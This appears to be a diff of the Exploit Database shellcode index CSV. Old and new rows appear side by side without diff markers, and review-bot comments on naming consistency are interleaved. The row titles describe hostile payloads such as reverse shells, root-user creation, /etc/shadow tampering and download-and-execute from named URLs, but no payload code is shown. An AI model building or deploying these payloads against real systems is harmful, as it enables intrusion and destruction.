13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
@ -322,14 +322,14 @@ id,file,description,date,author,type,platform
13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13635,shellcodes/windows_x86/13635.as,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.asm,"Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.as,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
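Review bot: 13648 gains a `(Generator)` tag in its title, but its path stays `shellcodes/windows_x86/13648.rb` and its platform stays `windows_x86`. Other rows carrying the same tag in this file (for example 15712, `shellcodes/generator/15712.rb`, platform `generator`) live under `shellcodes/generator/`. Either move 13648 to the generator directory and platform, or drop the tag, so that the title and the platform column agree.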
@ -342,14 +342,14 @@ id,file,description,date,author,type,platform
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13688,shellcodes/linux_x86-64/13688.c,"Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13703,shellcodes/linux_x86/13703.c,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
@ -357,14 +357,14 @@ id,file,description,date,author,type,platform
13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13719,shellcodes/windows_x86-64/13719.c,"Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.c,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.c,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13729,shellcodes/windows_x86-64/13729.c,"Windows/x64 (7) - cmd.exe Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
@ -372,19 +372,19 @@ id,file,description,date,author,type,platform
13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.c,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
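Review bot: the call-style normalisation is applied unevenly within this hunk. 14014 becomes `URLDownloadToFileA() + CreateProcessA() + ExitProcess()`, while 14052, edited a few rows below, becomes `WinExec(cmd.exe) + ExitProcess` with no parentheses on `ExitProcess`. Pick one form for API names without arguments and apply it to both rows, so that a search for `ExitProcess()` finds every entry.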
@ -396,10 +396,10 @@ id,file,description,date,author,type,platform
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14305,shellcodes/linux_x86-64/14305.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
@ -413,34 +413,34 @@ id,file,description,date,author,type,platform
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18197,shellcodes/linux_x86-64/18197.c,"Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18585,shellcodes/linux_x86-64/18585.s,"Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
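Review bot: the 17545 row is rewritten for the `.txt` to `.c` extension change, but the new line still carries the stray space in `(PerfectXp-pc1/SP3 )`. Since the row is already being touched, tidy the title to `(PerfectXp-pc1/SP3)` in the same change rather than leaving it for a later cleanup pass.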
@ -448,9 +448,9 @@ id,file,description,date,author,type,platform
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
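Review bot: the 24318 retitle from `Windows/x86-64 / x86 (2000/XP/7)` to `Windows (2000/XP/7)` removes the only architecture information in the row, because the platform column is just `windows`. If the shellcode targets both architectures, keep that in the title in the new naming style (for example `Windows/x86 + x64`) so the entry stays findable by architecture.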
@ -461,23 +461,23 @@ id,file,description,date,author,type,platform
28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
